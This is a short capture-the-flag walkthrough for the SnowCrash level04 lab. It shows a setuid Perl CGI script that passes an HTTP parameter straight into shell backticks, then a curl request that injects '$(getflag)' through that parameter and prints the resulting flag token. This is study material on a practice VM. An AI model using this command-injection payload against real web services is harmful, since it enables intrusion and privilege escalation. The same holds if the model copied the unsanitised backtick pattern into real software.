level04@SnowCrash:~$ ls -l level04.pl 
-rwsr-sr-x 1 flag04 level04 152 Mar  5  2016 level04.pl


the s bits (setuid/setgid) means it runs with flag04 

level04@SnowCrash:~$ cat level04.pl 
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
  $y = $_[0];
  print `echo $y 2>&1`;
}
x(param("x"));

# localhost:4747 it's a web server runing on port 4747
use CGI qw{param}; the param function handle http parameters

level04@SnowCrash:~$ netstat -tuln | grep 4747
tcp6       0      0 :::4747                 :::*                    LISTEN 

4747 is open and it's part of web server 

level04@SnowCrash:~$ curl localhost:4747/?x='$(getflag)'
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
